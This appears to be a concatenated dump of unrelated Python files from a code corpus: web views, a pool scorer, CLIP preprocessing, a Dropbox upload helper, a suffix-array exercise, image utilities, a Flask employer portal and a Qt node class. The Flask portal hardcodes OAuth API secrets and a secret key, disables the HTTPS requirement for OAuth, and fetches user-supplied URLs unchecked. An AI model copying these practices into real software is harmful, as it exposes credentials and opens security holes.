request.dbsession.query(\n Operateur\n ).filter(\n Operateur.id == operateur_id\n ).first()\n\n ctrl['operateur_prenom_nom'] = ' '.join([operateur.prenom, operateur.nom])\n else:\n ctrl['operateur_prenom_nom'] = None\n\n return ctrl\n\n\n@view_config(route_name='controles_mutations', request_method='POST', renderer='json')\n@view_config(route_name='controles_mutations_s', request_method='POST', renderer='json')\ndef controles_mutations_new_view(request):\n \"\"\"\n Add new controle_mutation\n \"\"\"\n # Check authorization\n if not Utils.has_permission(request, request.registry.settings['affaire_edition']):\n raise exc.HTTPForbidden()\n\n Utils.addNewRecord(request, ControleMutation)\n\n return Utils.get_data_save_response(Constant.SUCCESS_SAVE.format(ControleMutation.__tablename__))\n\n\n@view_config(route_name='controles_mutations', request_method='PUT', renderer='json')\n@view_config(route_name='controles_mutations_s', request_method='PUT', renderer='json')\ndef controles_mutations_update_view(request):\n \"\"\"\n Update controle_mutation\n \"\"\"\n # Check authorization\n if not Utils.has_permission(request, request.registry.settings['affaire_edition']):\n raise exc.HTTPForbidden()\n\n # Get controle mutation id\n id = request.params['id'] if 'id' in request.params else None\n\n # Get controle mutation record\n record = request.dbsession.query(ControleMutation).filter(\n ControleMutation.id == id).first()\n\n if not record:\n raise CustomError(\n CustomError.RECORD_WITH_ID_NOT_FOUND.format(ControleMutation.__tablename__, id))\n\n record = Utils.set_model_record(record, request.params)\n\n return Utils.get_data_save_response(Constant.SUCCESS_SAVE.format(ControleMutation.__tablename__))\n\n\n@view_config(route_name='controles_mutations', request_method='DELETE', renderer='json')\n@view_config(route_name='controles_mutations_s', request_method='DELETE', renderer='json')\ndef controles_mutations_delete_view(request):\n \"\"\"\n Delete controle_mutation\n \"\"\"\n # Check authorization\n if not Utils.has_permission(request, request.registry.settings['affaire_edition']):\n raise exc.HTTPForbidden()\n\n # Get controle mutation id\n id = request.params['id'] if 'id' in request.params else None\n\n # Get controle mutation record\n record = request.dbsession.query(ControleMutation).filter(\n ControleMutation.id == id).first()\n\n if not record:\n raise CustomError(\n CustomError.RECORD_WITH_ID_NOT_FOUND.format(ControleMutation.__tablename__, id))\n\n request.dbsession.delete(record)\n\n return Utils.get_data_save_response(Constant.SUCCESS_DELETE.format(ControleMutation.__tablename__))\n\n\n@view_config(route_name='controle_mutation_geos', request_method='GET', renderer='json')\ndef controles_mutations_delete_view(request):\n \"\"\"\n Trigger controle_mutation_geos\n \"\"\"\n # Check authorization\n if not Utils.has_permission(request, request.registry.settings['affaire_edition']):\n raise exc.HTTPForbidden()\n\n # Get controle mutation id\n affaire_id = request.params['affaire_id'] if 'affaire_id' in request.params else None\n\n operateur = Utils.getOperateurFromUser(request)\n\n url = request.registry.settings['infolica_cron_url_trigger'] + 'controle_mutation_geos?' \\\n 'variables=mutation={}|initiale={}|mail={}'.format(affaire_id, operateur.initiales, operateur.mail)\n \n return {'url': url}\n","sub_path":"back/infolica/views/controle_mutation.py","file_name":"controle_mutation.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"446280470","text":"import os\nimport pickle\nimport openpyxl as xl\n\n\nwith open('players', 'rb') as fichier:\n mon_depickler = pickle.Unpickler(fichier)\n players = mon_depickler.load()\n\nwith open('matchs', 'rb') as fichier:\n mon_depickler = pickle.Unpickler(fichier)\n matchs = mon_depickler.load()\n\n# print(players)\n\n\nresults = {}\nfor elt in players:\n results[elt] = 0\n\n# for i, j in results.items():\n# print(f\"{i} = {j} pts\")\n\nfor elt in matchs:\n print(f\"{elt} : who won the match ? \")\n okay = False\n while not okay:\n winner = input(\":->\").title()\n if winner not in players:\n print(\"Unkown player\")\n continue\n elif winner in players:\n points = results.get(winner)\n results[winner] = points + 3\n okay = True\n\nwb = xl.load_workbook(\"poolresults.xlsx\")\nsheet = wb[\"Feuil1\"]\n\nrow = 3\n\nfor i, j in results.items():\n cell_name = sheet.cell(row, 3)\n cell_marks = sheet.cell(row, 4)\n cell_name.value = i\n cell_marks.value = j\n row += 1\n\nwb.save(\"poolresults.xlsx\")\n\nos.system(\"pause\")\n","sub_path":"pool_ranking.py","file_name":"pool_ranking.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"21627377","text":"'''\nNOTE: This only works for test and val because they are small. This does NOT work on train.\nUse the scripts process_texts_to_tokens.py followed by process_tokens_to_encodings.py \nfor the same effect.\n\nPre-processing Step 1:\nInput: JSON file\nOutput: Pytorch (.pt) file\nGenerates a pytorch file containing a list of the text caption CLIP encodings.\nThis is generated as a preprocessing step because it is more efficient for \nthe CLIP model to encode in large batches rather than 1 string at a time.\n\n\n'''\nimport json\nimport os.path\nfrom os import path\nimport clip\nimport torch\n\nJSON_FILE = '/home/ubuntu/vist/sis/train.story-in-sequence.json'\nENCODINGS_FILE = 'train_text_encodings_0.pt' # a list of the text encodings in the same order as they appear in the file\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nprint(\"Device: %s\" % device)\n\n# Load the json annotation file\nprint(\"Loading json file...\")\nwith open(JSON_FILE) as f:\n data = json.load(f)\n\nannotations = data['annotations']\nraw_texts = []\nfor annot in annotations:\n # Extract relevant fields\n annot_dict = annot[0]\n raw_texts.append(annot_dict['text'])\n\n\n# Load the CLIP text encoder model\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nprint(\"Device: %s\" % device)\nprint(\"Loading CLIP model...\")\nmodel, preprocess = clip.load('ViT-B/32', device)\n\nprint(\"Clearing json object...\")\ndata.clear()\n\nprint(\"Clearing cuda cache...\")\ntorch.cuda.empty_cache()\n\n# Prepare the inputs\nprint(\"Tokenizing raw texts...\")\ntext_inputs = torch.cat([clip.tokenize(text) for text in raw_texts]).to(device)\n\n# Calculate features\nprint(\"Encoding tokenized texts...\")\nwith torch.no_grad():\n text_features = model.encode_text(text_inputs)\n\nprint(text_features.size())\n\nprint(\"Saving to torch file %s\" % ENCODINGS_FILE)\ntorch.save( text_features, open( ENCODINGS_FILE, \"wb\" ) )\n \n","sub_path":"vist_dataset/process_texts_to_encodings.py","file_name":"process_texts_to_encodings.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"526014972","text":"from .types import ActFailedError\n\nclass BasicAct:\n\t\"\"\"Wrapper for basic acts.\n\tBasic act locally accessed act.\n\t\"\"\"\n\n\tdef __init__(self, obj):\n\t\tself.obj = obj\n\n\tdef call(self, data):\n\t\tif not self.obj.setData(data):\n\t\t\traise ValueError(\"Invalid input: %s\" % data)\n\n\t\tif not self.obj.execute():\n\t\t\traise ActFailedError(\"Act %s failed\" % self.__class__.__name__)\n\n\t\treturn self.obj.getData()\n","sub_path":"system/core/acts/basicact.py","file_name":"basicact.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"609185844","text":"import os \nimport tqdm\nimport shutil\nfrom . import haven_utils as hu \nfrom . import haven_jupyter as hj\n\n\ndef to_dropbox(exp_list, savedir_base, dropbox_path, access_token, zipname):\n \"\"\"[summary]\n \n Parameters\n ----------\n exp_list : [type]\n [description]\n savedir_base : [type]\n [description]\n dropbox_path : [type]\n [description]\n access_token : [type]\n [description]\n \"\"\"\n # zip files \n exp_id_list = [hu.hash_dict(exp_dict) for exp_dict in exp_list]\n src_fname = os.path.join(savedir_base, zipname)\n out_fname = os.path.join(dropbox_path, zipname)\n zipdir(exp_id_list, savedir_base, src_fname)\n\n upload_file_to_dropbox(src_fname, out_fname, access_token)\n print('saved: https://www.dropbox.com/home/%s' % out_fname)\n\n \ndef upload_file_to_dropbox(src_fname, out_fname, access_token):\n import dropbox\n dbx = dropbox.Dropbox(access_token)\n try:\n dbx.files_delete_v2(out_fname)\n except:\n pass\n # with open(src_fname, 'rb') as f:\n # dbx.files_upload(f.read(), out_fname)\n\n upload(access_token=access_token,\n file_path=src_fname,\n target_path=out_fname)\n\n\ndef upload(\n access_token,\n file_path,\n target_path,\n timeout=900,\n chunk_size=4 * 1024 * 1024,\n):\n import os\n import dropbox\n import tqdm\n dbx = dropbox.Dropbox(access_token, timeout=timeout)\n with open(file_path, \"rb\") as f:\n file_size = os.path.getsize(file_path)\n chunk_size = 4 * 1024 * 1024\n if file_size <= chunk_size:\n print(dbx.files_upload(f.read(), target_path))\n else:\n with tqdm.tqdm(total=file_size, desc=\"Uploaded\") as pbar:\n upload_session_start_result = dbx.files_upload_session_start(\n f.read(chunk_size)\n )\n pbar.update(chunk_size)\n cursor = dropbox.files.UploadSessionCursor(\n session_id=upload_session_start_result.session_id,\n offset=f.tell(),\n )\n commit = dropbox.files.CommitInfo(path=target_path)\n while f.tell() < file_size:\n if (file_size - f.tell()) <= chunk_size:\n print(\n dbx.files_upload_session_finish(\n f.read(chunk_size), cursor, commit\n )\n )\n else:\n dbx.files_upload_session_append(\n f.read(chunk_size),\n cursor.session_id,\n cursor.offset,\n )\n cursor.offset = f.tell()\n pbar.update(chunk_size)\n print('uploaded!')\n\n\ndef zipdir(exp_id_list, savedir_base, src_fname, add_jupyter=True, verbose=1, \n fname_list=None, dropbox_path='/shared', access_token=None):\n import zipfile\n zipf = zipfile.ZipFile(src_fname, 'w', zipfile.ZIP_DEFLATED)\n\n # ziph is zipfile handle\n if add_jupyter:\n abs_path = os.path.join(savedir_base, 'results.ipynb')\n hj.create_jupyter(fname=abs_path, \n savedir_base='results/', overwrite=False, print_url=False,\n create_notebook=True)\n \n rel_path = 'results.ipynb'\n zipf.write(abs_path, rel_path)\n os.remove(abs_path)\n\n n_zipped = 0\n if verbose:\n tqdm_bar = tqdm.tqdm\n else:\n tqdm_bar = lambda x: x\n \n fname_all = ['score_list.pkl', \"exp_dict.json\"] \n if isinstance(fname_list, list):\n fname_all += fname_list\n\n for exp_id in tqdm_bar(exp_id_list):\n if not os.path.isdir(os.path.join(savedir_base, exp_id)):\n continue\n \n for fname in fname_all:\n abs_path = os.path.join(savedir_base, exp_id, fname)\n rel_path = os.path.join( \"results\", exp_id, fname)\n if os.path.exists(abs_path):\n zipf.write(abs_path, rel_path)\n\n n_zipped += 1\n\n zipf.close()\n if verbose:\n print('Zipped: %d/%d exps in %s' % (n_zipped, len(exp_id_list), src_fname))\n\n if access_token is not None and access_token != '':\n out_fname = os.path.join(dropbox_path, src_fname)\n upload_file_to_dropbox(src_fname, out_fname, access_token)\n print('saved: https://www.dropbox.com/home/%s' % out_fname)","sub_path":"haven/haven_share/haven_dropbox.py","file_name":"haven_dropbox.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"175094550","text":"# modified binary search to return multiple contiguos hits\ndef binarySearch(alist, item):\n if len(alist) == 0:\n return False\n else:\n midpoint = len(alist)//2\n if alist[midpoint].startswith(item):\n results = {alist[midpoint]}\n for x in alist[midpoint:]:\n if x.startswith(item):\n results.add(x)\n else:\n break\n return results\n else:\n if item<alist[midpoint][:3]:\n return binarySearch(alist[:midpoint],item)\n else:\n return binarySearch(alist[midpoint+1:],item)\n \n\ndef create_suffix_array(s):\n suffix_array = [s[i:]+\"#\"+str(i) for i in range(len(s))]\n suffix_array.sort(key=None, reverse=False)\n return suffix_array\n\ndef create_grams(sequence, gram_length):\n grams = [sequence[i:i+gram_length]\n for i in range(len(sequence)+1-gram_length)]\n return grams\n\ndef find_grams_in_sequence(suffix_array, grams_array):\n pairs = list()\n \n for idy,y in enumerate(grams_array):\n results = binarySearch(suffix_array, y)\n pairs.extend([(int(x[x.index(\"#\")+1:]),idy)\n for x in results ])\n \n pairs.sort(key=None, reverse=False)\n\n return pairs\n \ndef find_identical_pairs(suffix_array, grams_array, gram_length,\n sequence):\n pairs = find_grams_in_sequence(suffix_array, grams_array)\n \n # create a list for results\n substring_indexes_list = list()\n \n \n \n # start with the first pair, since there can't be any matchings \n # before it\n current_suffix_index = pairs[0][0]\n current_gram = pairs[0][1]\n \n # a list of lists to save the begining and end of each \n # substring\n substring_indexes = [\n [current_suffix_index,current_suffix_index+gram_length-1], \n [current_gram,current_gram+gram_length-1]]\n \n # try and extend the matching by iterating over the rest of \n # pairs, and extending if the next pair directly follows the \n # previous\n for x in pairs[1:]:\n \n # if the next pair doesn't lead to an extension, then we \n # have found a maximal segment pair. Add that to the list \n # and start a new one\n if ( x[0] != current_suffix_index+1\n or x[1] != current_gram +1):\n \n substring_indexes_list.append(substring_indexes)\n \n current_suffix_index = x[0]\n current_gram = x[1]\n \n substring_indexes = \\\n [[current_suffix_index,current_suffix_index\n +gram_length-1]\n , [current_gram,current_gram+gram_length-1]]\n continue\n \n # update the current indexes\n current_gram = x[1]\n current_suffix_index = x[0]\n \n # extend the segment pair by incrementing the end index\n substring_indexes[0][1] = substring_indexes[0][1]+1\n substring_indexes[1][1] = substring_indexes[1][1]+1\n \n substring_indexes_list.append(substring_indexes)\n \n return substring_indexes_list\n\ndef mark_substrings(pair, sequence, query):\n marked_sequence = sequence[:pair[0][0]]+\"(\" \\\n +sequence[pair[0][0]:pair[0][1]+1] \\\n +\")\"+sequence[pair[0][1]+1:]\n marked_query = query[:pair[1][0]]+\"(\" \\\n +query[pair[1][0]:pair[1][1]+1] \\\n +\")\"+query[pair[1][1]+1:]\n return \"\\n\".join([marked_sequence,marked_query])\n\n\n\n\n\nif(__name__ == \"__main__\"):\n s = \"CGATCGCCATGGCTAACGTT\"\n q = \"CATGGCCA\"\n gram_length = 3\n \n suffix_array = create_suffix_array(s);\n grams_array = create_grams(q, gram_length)\n \n pairs = \\\n find_identical_pairs(suffix_array, grams_array, gram_length, s)\n \n print(\"the matching substrings are marked with parentheses\\n\")\n for pair in pairs:\n print(mark_substrings(pair,s,q)+\"\\n\")\n","sub_path":"bio1/sheet9/programs/exercise3.py","file_name":"exercise3.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"28994830","text":"\"\"\"\r\nGeneral script settings.\r\nFor changing system or parameter defaults, use \"biology.default_values.py\" file\r\n\"\"\"\r\n\r\n# User defined values\r\nOUTPUT_FOLDER = \"output\"\r\nNAME_OF_SCRIPT_LOG_FILE = \"script.log\" # Name of script Log file\r\nNAME_OF_OUTPUT_FILE = \"output.log\" # Name of output file\r\n# True if you want to store script log in external file. (Recommended : True)\r\nSTORE_SCRIPT_LOG = True\r\nPRINT_TO_CONSOLE = True # True if script log should be shown on console\r\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"87499887","text":"'''\nUsing names.txt (right click and 'Save Link/Target As...'), a 46K text file containing over five-thousand first names, begin by sorting it into alphabetical order. Then working out the alphabetical value for each name, multiply this value by its alphabetical position in the list to obtain a name score.\n\nFor example, when the list is sorted into alphabetical order, COLIN, which is worth 3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. So, COLIN would obtain a score of 938 × 53 = 49714.\n\nWhat is the total of all the name scores in the file?\n'''\n\nimport numpy as np\n\ndef length_of_names(name):\n num = [ord(name[alphabet]) - 64 for alphabet in range(0, len(name))]\n return sum(num)\n\ndef read_data(filename):\n with open(filename, \"r\") as file:\n names = file.read()\n names = names.replace('\"','').split(',')\n names.sort()\n return names\n\n\nnames = read_data(\"names.txt\")\nalphabet_values = [length_of_names(name) for name in names]\n\nname_scores = np.dot(alphabet_values, list(range(1, len(names)+1)))\nprint(\"Name scores =\", name_scores)\n","sub_path":"andrew/euler/euler_22.py","file_name":"euler_22.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"648013729","text":"import re\nimport os\nimport numpy as np\nfrom PIL import Image\nfrom StringIO import StringIO\n\nimport words\nfrom words import VOCABULARY_SIZE\n\n\nIMG_SHAPE = (224,224)\nMAX_WORDS = 10\n\n\ndef onehot(index):\n res = np.zeros(VOCABULARY_SIZE)\n res[index] = 1.0\n return res\n\n\ndef expand(x):\n return np.expand_dims(x, axis=0)\n\n\n# Swiss army knife for image decoding\ndef decode_jpg(jpg, box=None, crop_to_box=None, preprocess=True):\n if jpg.startswith('\\xFF\\xD8'):\n # jpg is a JPG buffer\n img = Image.open(StringIO(jpg))\n else:\n # jpg is a filename\n img = Image.open(jpg)\n img = img.convert('RGB')\n width = img.width\n height = img.height\n if crop_to_box:\n # Crop to bounding box\n x0, x1, y0, y1 = crop_to_box\n img = img.crop((x0,y0,x1,y1))\n if preprocess:\n img = img.resize(IMG_SHAPE)\n pixels = np.array(img).astype(float)\n if preprocess:\n pixels = imagenet_process(pixels)\n if box:\n # Transform a bounding box after resizing\n x0, x1, y0, y1 = box\n xs = float(pixels.shape[1]) / width\n ys = float(pixels.shape[0]) / height\n x0 *= xs\n x1 *= xs\n y0 *= ys\n y1 *= ys\n return pixels, (x0, x1, y0, y1)\n return pixels\n\n\ndef encode_jpg(pixels):\n img = Image.fromarray(pixels.astype(np.uint8)).convert('RGB')\n fp = StringIO()\n img.save(fp, format='JPEG')\n return fp.getvalue()\n\n\ndef imagenet_process(x):\n x[:, :, 0] -= 103.939\n x[:, :, 1] -= 116.779\n x[:, :, 2] -= 123.68\n # 'RGB'->'BGR'\n return x[:, :, ::-1]\n\n\ndef left_pad(indices):\n res = np.zeros(MAX_WORDS, dtype=int)\n res[MAX_WORDS - len(indices):] = indices\n return res\n\n\n\ndef show(jpg, box=None):\n if type(jpg) == type(np.array([])):\n pixels = jpg\n else:\n pixels = decode_jpg(jpg, preprocess=False)\n if box:\n draw_box(pixels, box)\n with open('/tmp/example.jpg', 'w') as fp:\n fp.write(encode_jpg(pixels))\n os.system('imgcat /tmp/example.jpg')\n\n\ndef draw_box(img, box, color=1.0):\n x0, x1, y0, y1 = (int(val) for val in box)\n height, width, channels = img.shape\n x0 = np.clip(x0, 0, width-1)\n x1 = np.clip(x1, 0, width-1)\n y0 = np.clip(y0, 0, height-1)\n y1 = np.clip(y1, 0, height-1)\n img[y0:y1,x0] = color\n img[y0:y1,x1] = color\n img[y0,x0:x1] = color\n img[y1,x0:x1] = color\n\n\ndef strip(text):\n # Remove the START_TOKEN\n text = text.replace('000', '')\n # Remove all text after the first END_TOKEN\n end_idx = text.find('001')\n if end_idx >= 0:\n text = text[:end_idx]\n # Remove non-alphanumeric characters and lowercase everything\n return re.sub(r'\\W+', ' ', text.lower()).strip()\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"516258220","text":"from flask import Flask, render_template, request, flash, logging, url_for, redirect, jsonify, make_response, session, g\nfrom flask_sqlalchemy import SQLAlchemy\nimport requests\nimport json\nimport logging\nimport xml.etree.ElementTree as ET\nfrom flask_dance.contrib.twitter import make_twitter_blueprint, twitter\nfrom flask_dance.contrib.github import make_github_blueprint, github \nimport os \nfrom CloudFlask import app, db\n\n# app = Flask(__name__)\n\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:sneha3010@localhost/projectdb'\napp.config['SECRET_KEY'] = 'thisisasecretkey'\n\n# Source: https://stackoverflow.com/questions/27785375/testing-flask-oauthlib-locally-without-https\n# for github HTTPS\nos.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\n\ntwitter_blueprint = make_twitter_blueprint(api_key='snajatcEGgC19dwf9AFNQMtM8 ', api_secret='ieX5hO4amP6ay6bkPCyY1Bfla9BtWMla7NWRN9nyzu4tDdVKR4')\ngithub_blueprint = make_github_blueprint(client_id='b1198cf45b0983ee621f', client_secret='80ad32fdf60fc3350e398da866e77891075d15b4')\n\napp.register_blueprint(twitter_blueprint, url_prefix = '/twitter_login')\napp.register_blueprint(github_blueprint, url_prefix = '/github_login')\n\n# db = SQLAlchemy(app)\n\n# employee_id = '1'\n\nclass Employee_details(db.Model):\n\t__tablename__ = 'emp_employee1'\n\tusername = db.Column('username', db.Unicode, primary_key=True)\n\tpassword = db.Column('password', db.Unicode)\n\temp_name = db.Column('emp_name', db.Unicode)\n\tsalary = db.Column('salary', db.Integer)\n\temp_start_date = db.Column('emp_start_date', db.DateTime)\n\nwith app.app_context():\n db.create_all()\nflag = False\n\n@app.route('/')\ndef home(): \n# if github.authorized:\n\tprint(\"A\")\n\taccount_info = github.get('/user')\n\tprint(account_info)\n\tgit_username = ''\n\tprint(git_username)\n\tprint('Checking uname')\n\tif account_info.ok and flag==False:\n\t\tprint('Checking uname started')\n\t\taccount_info_json = account_info.json()\n\t\tgit_username = account_info_json['login']\n\t\tprint(git_username)\n\t\tsession['user'] = git_username\n\t\tprint(\"Reach\")\n\t\treturn redirect(url_for('addEmployer', username=session['user']))\n\treturn render_template('employer_home.html')\n\n@app.before_request\ndef before_request():\n\tg.user =None\n\tif 'user' in session:\n\t\tg.user = session['user']\n\n\n# @app.route('/github')\n# def github_login():\t\n# \taccount_info = github.get('/user')\n# \tprint('4')\n# \tif account_info.ok:\n# \t\taccount_info_json = account_info.json()\n\n# \t\treturn '<h1> Your GitHub name is @{}'.format(account_info_json['login'])\n\n\n@app.route('/github_login', methods=['GET', 'POST'])\ndef github_login():\n\n\t\n\n\tsession.pop('user', None)\n\t# print('1')\n\t# if not twitter.authorized:\n\t# \tprint('2')\n\t# \treturn redirect(url_for('twitter.login'))\n\t# print('3')\n\t# account_info = twitter.get('account/settings')\n\t# print('4')\n\t# if account_info.ok:\n\t# \taccount_info_json = account_info.json()\n\n\t# \treturn '<h1> Your Twitter name is @{}'.format(account_info_json['screen_name'])\n\n\t# Correct code\n\t# if not github.authorized:\n\t# \treturn redirect(url_for('github.login'))\n\t# account_info = github.get('/user')\n\t# git_username = ''\n\t# if account_info.ok:\n\t# \taccount_info_json = account_info.json()\n\t# \tgit_username = account_info_json['login']\n\n\n\n\tf = open(\"log1.txt\", \"a+\")\n\tf.write(\"method: GET \\nEnd-point: http://127.0.0.1:8001/login \\nparameters: None\\n\" )\n\tf.close()\n\t# Employee_details1 = Employee_details.query.filter_by(username=username),first()\n\t\n\t\n\n\tif request.method == 'POST':\n\t\tf = open(\"log1.txt\", \"a+\")\n\t\tf.write(\"method: POST \\nEnd-point: http://127.0.0.1:8001/login \\nparameters: Login from git \")\n\t\tf.close()\n\n\t\t### CODE FOR OAUTH\n\t\tprint(\"Reach0\")\n\t\tif not github.authorized:\n\t\t\tprint(\"NA\")\n\t\t\treturn redirect(url_for('github.login'))\n\t\tprint(\"A\")\n\t\taccount_info = github.get('/user')\n\t\tprint(account_info)\n\t\tgit_username = ''\n\t\tprint(git_username)\n\t\tprint('Checking uname')\n\t\tif account_info.ok:\n\t\t\tprint('Checking uname started')\n\t\t\taccount_info_json = account_info.json()\n\t\t\tgit_username = account_info_json['login']\n\t\t\tprint(git_username)\n\t\t\tsession['user'] = git_username\n\t\t\tprint(\"Reach\")\n\t\t\treturn redirect(url_for('addEmployer', username=session['user']))\n\n\t\t## MAINSTREAM LOGIN\n\t\t# for i in range(1):\n\t\t# \tf.write(\"POST, http://127.0.0.1:8001/login, username: \"+request.form['username']+\", password: \"+request.form['password']+\" %d\\r\\n\" % (i))\n\t\t# emppass = request.form\n\t\t# username = request.form['username']\n\t\t# get_emp = Employee_details.query.filter_by(username=username).first()\n\t\t# password = request.form['password']\n\n\n\t\t# pathToXML = \"Salt.xml\"\n\t\t# tree = ET.parse(pathToXML)\n\t\t# root = tree.getroot()\n\n\t\t# # all items data\n\t\t# print('Expertise Data:'+str(root)+str(tree))\n\t\t# salt = ''\n\t\t# for elem in root:\n\t\t# \tsalt = elem.text\n\n\n\t\t# if get_emp is None:\n\t\t# \terror = 'User not present! Try again.'\n\t\t# \treturn render_template('login.html', error = error)\n\t\t# if get_emp.password != password+salt:\n\t\t# \terror = 'Password do not match! Try again.'\n\t\t# \treturn render_template('login.html', error = error)\n\t\t# else:\n\t\t# session['user'] = username\n\t\t# return redirect(url_for('addEmployer', username=session['user']))\n\t\t\n\t\t\n\t# return '<h1>Request failed! <h1>'\n\t# return render_template('login.html')\n\treturn render_template('github_login.html')\n\n\n@app.route('/employer_form/<string:username>', methods=['POST','GET'])\ndef addEmployer(username):\n\tf = open(\"log1.txt\", \"a+\")\n\tf.write(\"method: GET \\nEnd-point: http://127.0.0.1:8001//employer_form/<string:username> \\nparameters: None\\n\" )\n\tf.close()\n\n\n\tif request.method == 'POST':\n\t\tprint(g.user)\n\t\t# f = open(\"log1.txt\", \"a+\")\n\t\t# f.write(\"method: POST \\nEnd-point: http://127.0.0.1:8001//employer_form/<string:username> \\nparameters: username: \"+request.form['username']+\", application_no: \"+request.form['application_no']+\", mbr_web_service: \"+request.form['mbr_web_service']+\" \")\n\t\t# f.close()\n\n\t\temployee = Employee_details()\n\t\temployerDetails = request.form\n\t\tusername = employerDetails[\"username\"]\n\t\tapplication_number = employerDetails[\"application_no\"]\n\t\tmbr_web_service_address = employerDetails[\"mbr_web_service\"]\n\n\t\tget_employee = Employee_details.query.filter_by(username=g.user).first()\n\t\turl = str(mbr_web_service_address)+'?salary='+str(get_employee.salary)+'&application_number='+str(application_number)+'&emp_name='+str(get_employee.emp_name)+'&emp_start_date='+str(get_employee.emp_start_date)\n\t\tprint(url)\n\t\ttry:\n\n\t\t\tr = requests.get(str(mbr_web_service_address)+'?salary='+str(get_employee.salary)+'&application_number='+str(application_number)+'&emp_name='+str(get_employee.emp_name)+'&emp_start_date='+str(get_employee.emp_start_date))\n\t\texcept:\n\t\t\tmessage = 'Invalid endpoint. try again'\n\t\t\treturn render_template('employer_updatestatus.html', message=message)\n\n\t\tif r.text == 'success':\n\n\t\t\tmessage = 'Employee details submitted sucessfully to MBR portal.'\n\t\t\treturn render_template('employer_updatestatus.html', message=message)\n\t\telse:\n\n\t \t\treturn \"<h1> Error occured while submitting details to MBR portal. </h1>\"\n\t \t\tdb.session.close_all()\n\t \t\tdb.session.add(employee)\n\t \t\tdb.session.commit()\n\n\t \t\treturn\"<h1> Employee details submitted sucessfully. </h1>\"\n\telse:\n\t\tif g.user:\n\t\t\treturn render_template('employer_form.html', username=username)\n\n\n\treturn redirect(url_for('github.login'))\n\n@app.route('/logout', methods=['GET'])\ndef logout():\n\tf = open(\"log1.txt\", \"w+\")\n\tf.write(\"method: GET \\nEnd-point: http://127.0.0.1:8001/logout \\nparameters: logged out\\n\" )\n\tf.close()\n\tsession.pop('user', None)\n\t# session.pop('user', None)\n\tflag = True\n\treturn redirect(url_for('github_login'))\n\n# if __name__ == '__main__':\n# \tapp.secret_key = 'abcdweb'\n# \tapp.run(debug=True, port=8001)","sub_path":"CloudFlask/employer_portal.py","file_name":"employer_portal.py","file_ext":"py","file_size_in_byte":7656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"487313332","text":"\n# PySide imports\nfrom PySide import QtGui, QtCore\n\n\n__all__ = ['GraphicsNode', 'Connection']\n\n\nclass GraphicsNode(QtGui.QGraphicsItem):\n \"\"\"\n Basic graphics item to be added to GraphicsWidgets.\n \"\"\"\n\n Rectangle, Radial = range(0, 2)\n\n def __init__(self,\n name,\n width=150,\n height=30,\n inputs=None,\n outputs=None,\n position=None,\n defaultOutput=True,\n color=None,\n nodeType=Rectangle):\n \"\"\"\n :return:\n \"\"\"\n super(GraphicsNode, self).__init__()\n\n self._name = name\n self._width = width\n self._height = height\n self.connections = []\n self._DoubleClickFunction = None\n self._data = {}\n self._color = color\n self._showData = 0\n self._nodeType = nodeType\n\n self._activeTerminal = None\n self._terminalPoints = {}\n\n self._inputs = {}\n self._outputs = {}\n\n if inputs:\n for input in inputs:\n self._inputs[input] = []\n\n if defaultOutput:\n self._outputs['output'] = []\n\n if outputs:\n for output in outputs:\n self._outputs[output] = []\n\n self._height = height * max(len(self._outputs.keys()), len(self._inputs.keys())) + height\n\n if self._nodeType == self.Radial:\n self._width = self._height\n\n self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable)\n self.setFlag(QtGui.QGraphicsItem.ItemIsMovable)\n\n if position is not None:\n self.setPos(position[0], position[1])\n\n self.update()\n\n def position(self):\n return self.pos().x(), self.pos().y()\n\n def inputs(self):\n return self._inputs\n\n def outputs(self):\n return self._outputs\n\n def name(self):\n return self._name\n\n def setDoubleClickFunction(self, function):\n self._DoubleClickFunction = function\n\n def dataKeys(self):\n return self._data.keys()\n\n def setData(self, key, data):\n self._data[key] = data\n\n def rawData(self):\n return self._data\n\n def data(self, key):\n data = self._data[key]\n return data\n\n def hold(self):\n self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable, False)\n self.setFlag(QtGui.QGraphicsItem.ItemIsMovable, False)\n\n def release(self):\n self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable)\n self.setFlag(QtGui.QGraphicsItem.ItemIsMovable)\n\n def terminal(self, point):\n \"\"\"\n Pick terminal\n \"\"\"\n for terminal in self._terminalPoints:\n if self._terminalPoints[terminal].contains(self.mapFromScene(point).x(), self.mapFromScene(point).y()):\n return terminal\n\n def mousePressEvent(self, event):\n \"\"\"\n Mouse press event override for highlighting.\n \"\"\"\n for terminal in self._terminalPoints.keys():\n self._showData = 0\n if terminal == 'data':\n if self._terminalPoints[terminal].contains(event.pos().x(), event.pos().y()):\n self._showData = 1\n return\n continue\n rect = self._terminalPoints[terminal]\n if rect.contains(event.pos().x(), event.pos().y()):\n self._activeTerminal = terminal\n self.update()\n self.hold()\n 